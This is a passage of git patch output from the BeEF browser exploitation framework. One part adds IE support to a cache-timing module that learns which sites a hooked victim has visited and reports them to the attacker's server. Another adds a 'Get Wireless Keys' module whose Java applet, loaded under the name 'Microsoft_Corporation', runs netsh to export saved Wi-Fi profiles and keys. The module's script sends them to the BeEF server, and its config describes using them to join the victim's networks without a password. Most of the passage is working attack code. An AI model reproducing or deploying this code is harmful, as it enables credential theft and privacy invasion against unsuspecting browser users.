'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] }, + { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] }, + + { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz', + 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] }, + { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] }, + { 'category': 'Content platforms' }, + { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] }, + { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] }, + { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] }, + { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] }, + { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] }, + { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] }, + { 'category': 'Online media' }, + { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] }, + { 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css', + 'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] }, + { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] }, + { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] }, + { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] }, + { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] }, + { 'category': 'Commerce' }, + { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12', + 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] }, + { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] }, + { 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] }, + { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] }, + { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] } + ]; + /************************* + * CONFIGURABLE SETTINGS * + *************************/ + var TIME_LIMIT = 5; + var MAX_ATTEMPTS = 2; +} +if (beef.browser.isIE() == 1) { + /**************** + * SCANNED URLS * + ****************/ + var targets = [ + { 'category': 'Social networks' }, + { 'name': 'Facebook', 'urls': [ 'http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png', + 'https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png' ] }, + { 'name': 'Twitter', 'urls': [ 'http://twitter.com/phoenix/favicon.ico', + 'https://twitter.com/phoenix/favicon.ico' ] }, + { 'name': 'LinkedIn', 'urls': [ 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png', + 'http://s3.licdn.com/scds/common/u/img/logos/logo_2_237x60.png', + 'http://s4.licdn.com/scds/common/u/img/logos/logo_132x32_2.png' ] }, + { 'name': 'Orkut', 'urls': [ 'http://static3.orkut.com/img/gwt/logo_orkut_default.png' ] }, + { 'name': 'Dogster', 'urls': [ 'http://a2.cdnsters.com/static/images/sitewide/logos/dsterBanner-sm.png' ] }, + { 'category': 'Content platforms' }, + { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/favicon-refresh-vfldLzJxy.ico' ] }, + { 'name': 'Hulu', 'urls': [ 'http://www.hulu.com/fat-favicon.ico' ] }, + { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/favicon.ico' ] }, + { 'name': 'Wikipedia (EN)', 'urls': [ 'http://en.wikipedia.org/favicon.ico' ] }, + { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/favicon.ico' ] }, + { 'category': 'Online media' }, + { 'name': 'New York Times', 'urls': [ 'http://css.nyt.com/images/icons/nyt.ico' ] }, + { 'name': 'CNN', 'urls': [ 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/hdr-main.gif', + 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif' ] }, + { 'name': 'Slashdot', 'urls': [ 'http://slashdot.org/favicon.ico', + 'http://a.fsdn.com/sd/logo_w_l.png' ] }, + { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/favicon.ico' ] }, + { 'name': 'Fox News', 'urls': [ 'http://www.foxnews.com/i/redes/foxnews.ico' ] }, + { 'name': 'AboveTopSecret.com', 'urls': [ 'http://files.abovetopsecret.com/images/atssitelogo-f.png' ] }, + { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/IMG/wlogo.png' ] /* this session only */ }, + { 'category': 'Commerce' }, + { 'name': 'Diapers.com', 'urls': [ 'http://c4.diapers.com/Images/favicon.ico' ] }, + { 'name': 'Amazon (US)', 'urls': [ 'http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V169459313_.gif' ] }, + { 'name': 'eBay', 'urls': [ 'http://www.ebay.com/favicon.ico' ] }, + { 'name': 'Walmart', 'urls': [ 'http://www.walmart.com/favicon.ico' ] }, + { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/Nest/Newegg.ico' ] } + ]; + /************************* + * CONFIGURABLE SETTINGS * + *************************/ + + var TIME_LIMIT = 1; + var MAX_ATTEMPTS = 1; +} + function sched_call(fn) { exec_next = fn; window.postMessage('123', '*'); } -/**************** - * SCANNED URLS * - ****************/ -var targets = [ - { 'category': 'Social networks' }, - { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', - 'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', - 'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] }, - { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] }, - - { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz', - 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] }, - { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] }, - { 'category': 'Content platforms' }, - { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] }, - { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] }, - { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] }, - { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] }, - { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] }, - { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] }, - { 'category': 'Online media' }, - { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] }, - { 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css', - 'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] }, - { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] }, - { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] }, - { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] }, - { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] }, - { 'category': 'Commerce' }, - { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12', - 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] }, - { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] }, - { 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] }, - { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] }, - { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] } -]; - - -/************************* - * CONFIGURABLE SETTINGS * - *************************/ -var TIME_LIMIT = 5; -var MAX_ATTEMPTS = 2; /********************** * MAIN STATE MACHINE * @@ -106,33 +156,70 @@ var start, stop, urls; frame some time to fully load. */ function perform_check() { wait_cycles = 0; - setTimeout(wait_for_read, 1); + if (beef.browser.isIE() == 1) { + setTimeout(wait_for_read, 0); + } + if (beef.browser.isFF() == 1) { + setTimeout(wait_for_read, 1); + } + } /* Confirm that data:... is loaded correctly. */ function wait_for_read() { + if (wait_cycles++ > 100) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry'); + return; + } + if (beef.browser.isFF() == 1) { + if (!frame_ready) { + setTimeout(wait_for_read, 1); + } else { + document.getElementById('f').contentWindow.stop(); + setTimeout(navigate_to_target, 1); + } + } + if (beef.browser.isIE() == 1) { + try{ + if (frames['f'].location.href != 'about:blank') throw 1; + //if(document.getElementById('f').contentWindow.location.href != 'about:blank') throw 1; + document.getElementById("f").src ='javascript:""'; + setTimeout(wait_for_read2, 0); + } catch (e) { + setTimeout(wait_for_read, 0); + } + } +} + +function wait_for_read2() { if (wait_cycles++ > 100) { beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry'); return; } if (!frame_ready) { - setTimeout(wait_for_read, 1); + setTimeout(wait_for_read2, 0); } else { - document.getElementById('f').contentWindow.stop(); - setTimeout(navigate_to_target, 1); + setTimeout(navigate_to_target, 1); } } + /* Navigate the frame to the target URL. */ function navigate_to_target() { cycles = 0; - sched_call(wait_for_noread); + if (beef.browser.isFF() == 1) { + sched_call(wait_for_noread); + } + if (beef.browser.isIE() == 1) { + setTimeout(wait_for_noread, 0); + } urls++; document.getElementById("f").src = current_url; } + /* The browser is now trying to load the destination URL. Let's see if we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache hit. If not, seems like cache miss. In both cases, the navigation @@ -140,44 +227,43 @@ function navigate_to_target() { function wait_for_noread() { try { + if (beef.browser.isIE() == 1) { + if (frames['f'].location.href == undefined){ + confirmed_visited = true; + throw 1; + } + if (cycles++ >= TIME_LIMIT) { + maybe_test_next(); + return; + } + setTimeout(wait_for_noread, 0); + } + if (beef.browser.isFF() == 1) { if (document.getElementById('f').contentWindow.location.href == undefined) { confirmed_visited = true; throw 1; } - if (cycles >= TIME_LIMIT) { - maybe_test_next(); - return; - } - sched_call(wait_for_noread); + if (cycles >= TIME_LIMIT) { + maybe_test_next(); + return; + } + sched_call(wait_for_noread); + } } catch (e) { confirmed_visited = true; maybe_test_next(); } } - -/* Just a logging helper. */ -function log_text(str, type, cssclass) { - results+="
"; - results+=str; - if(target_off==(targets.length-1)){ - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results); - setTimeout(reload,5000); - } -} - -function reload(){ - window.location.reload(); -} - -/* Decides what to do next. May schedule another attempt for the same target, - select a new target, or wrap up the scan. */ - function maybe_test_next() { - frame_ready = false; - document.getElementById('f').src = 'data:text/html,'; + if (beef.browser.isFF() == 1) { + document.getElementById('f').src = 'data:text/html,'; + } + if (beef.browser.isIE() == 1) { + document.getElementById("f").src = 'about:blank'; + } if (target_off < targets.length) { if (targets[target_off].category) { //log_text(targets[target_off].category + ':', 'p', 'category'); @@ -200,30 +286,48 @@ function maybe_test_next() { attempt++; perform_check(); } - } //else { - //en = (new Date()).getTime(); - //} + } } + +/* Just a logging helper. */ +function log_text(str, type, cssclass) { + results+="
"; + results+=str; + //alert(str); + if(target_off==(targets.length-1)){ + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results); + setTimeout(reload,3000); + } +} + +function reload(){ + //window.location.href=window.location.href; + window.location.reload(); +} + +/* Decides what to do next. May schedule another attempt for the same target, + select a new target, or wrap up the scan. */ + + + /* The handler for "run the test" button on the main page. Dispenses advice, resets state if necessary. */ function start_stuff() { - if (navigator.userAgent.indexOf('Firefox/') == -1) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox, and probably won\'t work for you.'); - //alert('This proof-of-concept is specific to Firefox, and probably won\'t work for you.\n\n' + - // 'Versions for other browsers can be found here:\n' + - // 'http://lcamtuf.coredump.cx/cachetime/'); - } - else{ - target_off = 0; + if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) { + target_off = 0; attempt = 0; confirmed_visited = false; urls = 0; results = ""; maybe_test_next(); } + else { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.'); + } } + beef.execute(function() { urls = undefined; exec_next = null; diff --git a/modules/browser/get_history/config.yaml b/modules/browser/get_history/config.yaml index 3cb2ea648..73f5b5d29 100644 --- a/modules/browser/get_history/config.yaml +++ b/modules/browser/get_history/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: "Browser" name: "History Extraction" - description: "This module will retrieve the session cookie from the current page." + description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/" authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] target: - working: ["FF"] + working: ["FF","IE"] diff --git a/modules/browser/get_history/module.rb b/modules/browser/get_history/module.rb index be20141df..9ffe12fa1 100644 --- a/modules/browser/get_history/module.rb +++ b/modules/browser/get_history/module.rb @@ -13,6 +13,7 @@ # See the License for the specific language governing permissions and # limitations under the License. # + class Get_history < BeEF::Core::Command def post_execute From daa37293fe64383d46eb335d81064ceba46bbd1d Mon Sep 17 00:00:00 2001 From: milo2012 Date: Sun, 11 Mar 2012 11:38:47 -0400 Subject: [PATCH 8/9] Fix Issue 88 - Working for IE and Firefox --- modules/host/get_wireless_keys/command.js | 30 +++++ modules/host/get_wireless_keys/config.yaml | 26 ++++ modules/host/get_wireless_keys/module.rb | 35 ++++++ .../wirelessZeroConfig.class | Bin 0 -> 2818 bytes .../get_wireless_keys/wirelessZeroConfig.jar | Bin 0 -> 3285 bytes .../get_wireless_keys/wirelessZeroConfig.java | 113 ++++++++++++++++++ 6 files changed, 204 insertions(+) create mode 100644 modules/host/get_wireless_keys/command.js create mode 100644 modules/host/get_wireless_keys/config.yaml create mode 100644 modules/host/get_wireless_keys/module.rb create mode 100644 modules/host/get_wireless_keys/wirelessZeroConfig.class create mode 100644 modules/host/get_wireless_keys/wirelessZeroConfig.jar create mode 100644 modules/host/get_wireless_keys/wirelessZeroConfig.java diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js new file mode 100644 index 000000000..54aec9505 --- /dev/null +++ b/modules/host/get_wireless_keys/command.js @@ -0,0 +1,30 @@ +// +// Copyright 2011 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; + var applet_id = '<%= @applet_id %>'; + var applet_name = '<%= @applet_name %>'; + var output; + beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'wirelessZeroConfig' , + null, applet_archive, null); + output = document.Microsoft_Corporation.getInfo(); + if (output) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+output); + } + beef.dom.detachApplet('wirelessZeroConfig'); +}); + + diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml new file mode 100644 index 000000000..9529b4ec5 --- /dev/null +++ b/modules/host/get_wireless_keys/config.yaml @@ -0,0 +1,26 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_wireless_keys: + enable: true + category: "Host" + name: "Get Wireless Keys" + description: "This module will retrieve the wireless profiles from the target computer.
You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command netsh wlan add profile filename=\"exported_wlan_profiles.xml\".
After that, just launch and connect to the wireless network without any password prompt.

For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html" + authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] + target: + working: ["IE"] + user_notify: ["C", "S", "O", "FF"] diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb new file mode 100644 index 000000000..0a3f75be2 --- /dev/null +++ b/modules/host/get_wireless_keys/module.rb @@ -0,0 +1,35 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_wireless_keys < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar','/wirelessZeroConfig','jar') + end + + def post_execute + content = {} + content['result'] = @datastore['result'].to_s + save content + f = File.open("exported_wlan_profiles.xml","w+") + f.write((@datastore['results']).sub("result=","")) + writeToResults = Hash.new + writeToResults['data'] = "Please import "+Dir.pwd+"/exported_wlan_profiles.xml into your windows machine" + BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults) + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar') + end + +end + diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.class b/modules/host/get_wireless_keys/wirelessZeroConfig.class new file mode 100644 index 0000000000000000000000000000000000000000..cb5a0838e11cb355019ff1b9bc333bc4d5c053cb GIT binary patch literal 2818 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 VMyif9G>p``Ks{gtRZ$w6{{Ulji_`!B literal 0 HcmV?d00001 diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java new file mode 100644 index 000000000..e0c349785 --- /dev/null +++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java @@ -0,0 +1,113 @@ +import java.io.*; +import java.util.*; +import java.net.*; +import java.applet.*; + +// Keith Lee +// Twitter: @keith55 +// http://milo2012.wordpress.com +// keith.lee2012[at]gmail.com + +public class wirelessZeroConfig extends Applet{ + public static String result = ""; + + public wirelessZeroConfig(){ + super(); + return; + } + public static String getInfo() { + return result; + } + + public void init() { + if (isWindows()) { + String osVersion= System.getProperty("os.version"); + if(osVersion.equals("6.0") || osVersion.equals("6.1")){ + result=getWindows(); + } + } else { + result = "OS is not supported"; + } + } + + public static String getWindows(){ + String cmd1 = "netsh wlan show profiles"; + String cmd2 = "netsh wlan export profile name="; + String keyword1 = "User profiles"; + String wlanProfileArr[]; + String wlanProfileName; + int match = 0; + int count = 0; + ArrayList profileList = new ArrayList(); + try { + //Get wlan profile names + Process p1 = Runtime.getRuntime().exec(cmd1); + BufferedReader in1 = new BufferedReader(new InputStreamReader(p1.getInputStream())); + String line = null; + //Checks if string match "User profiles" + while ((line = in1.readLine()) != null) { + //Checks if string match "User profiles" + if(match==0){ + if(line.toLowerCase().contains(keyword1.toLowerCase())){ + match=1; + } + } + if(match==1){ + if(count>1){ + //If string matches the keyword "User Profiles" + line = (line.replaceAll("\\s+$","").replaceAll("^\\s+", "")); + if(line.length()>0){ + wlanProfileName = (line.split(":")[1]).replaceAll("\\s+$","").replaceAll("^\\s+", "");; + profileList.add(wlanProfileName); + } + } + count+=1; + } + } + in1.close(); + } catch (IOException e) { } + + try{ + //Export WLAN Profile to XML file + for(Iterator iterator = profileList.iterator(); iterator.hasNext();){ + String profileName = iterator.next().toString(); + Process p2 = Runtime.getRuntime().exec(cmd2+'"'+profileName+'"'); + //Check if exported xml exists + File f = new File("Wireless Network Connection-"+profileName+".xml"); + if(f.exists()){ + //Read contents of XML file into results variable + FileInputStream fstream = new FileInputStream(f); + DataInputStream in2 = new DataInputStream(fstream); + BufferedReader br = new BufferedReader(new InputStreamReader(in2)); + String xmlToStr; + while((xmlToStr = br.readLine()) != null){ + result+=xmlToStr; + } + in2.close(); + } + } + } catch (IOException e) { + } 